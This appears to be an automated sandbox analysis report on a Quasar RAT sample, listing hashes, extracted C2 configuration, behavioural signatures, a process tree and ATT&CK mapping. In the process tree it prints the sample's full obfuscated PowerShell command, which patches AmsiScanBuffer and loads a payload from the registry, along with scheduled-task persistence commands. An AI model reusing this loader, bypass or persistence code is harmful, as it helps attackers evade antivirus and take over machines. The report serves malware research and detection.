Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-05-2024 20:58

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 56 IoCs
  • Modifies registry class 16 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{ebda6226-27e0-4ef9-a78a-c00da87155a5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4672
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:748
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:924
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1060
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1096
                      • C:\Windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2748
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zuIRpClMAmcb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mufpoEGkuQCsqC,[Parameter(Position=1)][Type]$uPFUfNuaMR)$rruSeLyayDL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+'d'+'D'+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+''+[Char](101)+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+[Char](117)+''+'l'+'e',$False).DefineType('MyD'+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+'e'+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+','+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+','+''+[Char](83)+'e'+'a'+''+'l'+''+'e'+''+'d'+''+','+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$rruSeLyayDL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mufpoEGkuQCsqC).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'an'+[Char](97)+''+'g'+'e'+[Char](100)+'');$rruSeLyayDL.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+',V'+'i'+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$uPFUfNuaMR,$mufpoEGkuQCsqC).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $rruSeLyayDL.CreateType();}$JHocPIXgFFfoy=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+'t'+'.'+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+'N'+'a'+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+'s');$lsMLwEsxPnyhBu=$JHocPIXgFFfoy.GetMethod(''+[Char](71)+'etPro'+'c'+'A'+[Char](100)+'d'+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+'l'+'i'+'c'+',S'+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fQJZOBalpSDsFacSGTM=zuIRpClMAmcb @([String])([IntPtr]);$uKlyEJqMRaWsgFGcSIhtxi=zuIRpClMAmcb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xDOQzTCVcRR=$JHocPIXgFFfoy.GetMethod('Ge'+'t'+'Mo'+[Char](100)+''+[Char](117)+'l'+'e'+''+[Char](72)+'a'+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'dll')));$WfbWNgQTIOhpZv=$lsMLwEsxPnyhBu.Invoke($Null,@([Object]$xDOQzTCVcRR,[Object]('Lo'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$gzyDkDzsktEuzTwbj=$lsMLwEsxPnyhBu.Invoke($Null,@([Object]$xDOQzTCVcRR,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'alP'+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$lzZaSbn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WfbWNgQTIOhpZv,$fQJZOBalpSDsFacSGTM).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$OvzCerSkoDaeppbLP=$lsMLwEsxPnyhBu.Invoke($Null,@([Object]$lzZaSbn,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+''+'a'+''+'n'+'Bu'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$xmDUWnWINA=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gzyDkDzsktEuzTwbj,$uKlyEJqMRaWsgFGcSIhtxi).Invoke($OvzCerSkoDaeppbLP,[uint32]8,4,[ref]$xmDUWnWINA);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OvzCerSkoDaeppbLP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gzyDkDzsktEuzTwbj,$uKlyEJqMRaWsgFGcSIhtxi).Invoke($OvzCerSkoDaeppbLP,[uint32]8,0x20,[ref]$xmDUWnWINA);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4364
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1212
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                          • Drops file in System32 directory
                          PID:1244
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1272
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1388
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1400
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2608
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1448
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1464
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                      1⤵
                                        PID:1520
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1616
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1660
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1716
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1776
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1792
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1884
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1896
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1980
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:1668
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2124
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                              1⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2240
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2288
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2412
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2424
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2640
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2736
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2788
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2832
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2868
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2888
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:2940
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:684
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3368
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Suspicious use of UnmapMainImage
                                                                                    PID:3464
                                                                                    • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                      2⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2488
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:2448
                                                                                      • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:388
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                          4⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:3408
                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:532
                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                        "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                        3⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4648
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                    1⤵
                                                                                      PID:3600
                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                      1⤵
                                                                                        PID:3784
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:3940
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:4160
                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                          1⤵
                                                                                            PID:4704
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                            1⤵
                                                                                              PID:4056
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:1420
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:2656
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4684
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1580
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                  1⤵
                                                                                                    PID:3948
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:2104
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4324
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:1840
                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                          1⤵
                                                                                                          • Modifies registry class
                                                                                                          PID:1588
                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          1⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Enumerates system info in registry
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:2108

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                        Execution

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Persistence

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Privilege Escalation

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Discovery

                                                                                                        Query Registry

                                                                                                        3
                                                                                                        T1012

                                                                                                        System Information Discovery

                                                                                                        3
                                                                                                        T1082

                                                                                                        Peripheral Device Discovery

                                                                                                        1
                                                                                                        T1120

                                                                                                        Command and Control

                                                                                                        Web Service

                                                                                                        1
                                                                                                        T1102

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          Filesize

                                                                                                          162KB

                                                                                                          MD5

                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                          SHA1

                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                          SHA256

                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                          SHA512

                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                        • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                          Filesize

                                                                                                          409KB

                                                                                                          MD5

                                                                                                          a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                          SHA1

                                                                                                          3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                          SHA256

                                                                                                          43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                          SHA512

                                                                                                          458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                        • C:\Windows\Temp\__PSScriptPolicyTest_sjffqcp1.rf1.ps1
                                                                                                          Filesize

                                                                                                          60B

                                                                                                          MD5

                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                          SHA1

                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                          SHA256

                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                          SHA512

                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                        • memory/384-89-0x00007FF97E770000-0x00007FF97E780000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/384-82-0x000001D5C1C80000-0x000001D5C1CAB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/384-88-0x000001D5C1C80000-0x000001D5C1CAB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/388-14-0x00000000744A0000-0x0000000074C50000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/388-708-0x00000000744A0000-0x0000000074C50000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/388-91-0x00000000072C0000-0x00000000072CA000-memory.dmp
                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/388-13-0x00000000744A0000-0x0000000074C50000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/616-56-0x00007FF97E770000-0x00007FF97E780000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/616-48-0x0000028E6E690000-0x0000028E6E6BB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/616-55-0x0000028E6E690000-0x0000028E6E6BB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/616-49-0x0000028E6E690000-0x0000028E6E6BB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/616-47-0x0000028E6E660000-0x0000028E6E685000-memory.dmp
                                                                                                          Filesize

                                                                                                          148KB

                                                                                                        • memory/672-60-0x000002C0BE130000-0x000002C0BE15B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/672-66-0x000002C0BE130000-0x000002C0BE15B000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/672-67-0x00007FF97E770000-0x00007FF97E780000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/748-94-0x00000180ED1D0000-0x00000180ED1FB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/960-78-0x00007FF97E770000-0x00007FF97E780000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/960-77-0x0000023A095D0000-0x0000023A095FB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/960-71-0x0000023A095D0000-0x0000023A095FB000-memory.dmp
                                                                                                          Filesize

                                                                                                          172KB

                                                                                                        • memory/2488-6-0x00000000055D0000-0x00000000055E2000-memory.dmp
                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2488-4-0x00000000744A0000-0x0000000074C50000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/2488-1-0x0000000000600000-0x000000000066C000-memory.dmp
                                                                                                          Filesize

                                                                                                          432KB

                                                                                                        • memory/2488-2-0x0000000005640000-0x0000000005BE4000-memory.dmp
                                                                                                          Filesize

                                                                                                          5.6MB

                                                                                                        • memory/2488-3-0x0000000005090000-0x0000000005122000-memory.dmp
                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/2488-5-0x0000000005130000-0x0000000005196000-memory.dmp
                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/2488-7-0x00000000062D0000-0x000000000630C000-memory.dmp
                                                                                                          Filesize

                                                                                                          240KB

                                                                                                        • memory/2488-20-0x00000000744A0000-0x0000000074C50000-memory.dmp
                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/2488-0-0x00000000744AE000-0x00000000744AF000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4364-30-0x000002727F6C0000-0x000002727F6E2000-memory.dmp
                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4364-31-0x000002727FA50000-0x000002727FA7A000-memory.dmp
                                                                                                          Filesize

                                                                                                          168KB

                                                                                                        • memory/4364-33-0x00007FF9BD610000-0x00007FF9BD6CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          760KB

                                                                                                        • memory/4364-32-0x00007FF9BE6F0000-0x00007FF9BE8E5000-memory.dmp
                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                        • memory/4672-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4672-41-0x00007FF9BD610000-0x00007FF9BD6CE000-memory.dmp
                                                                                                          Filesize

                                                                                                          760KB

                                                                                                        • memory/4672-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4672-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                          Filesize

                                                                                                          32KB

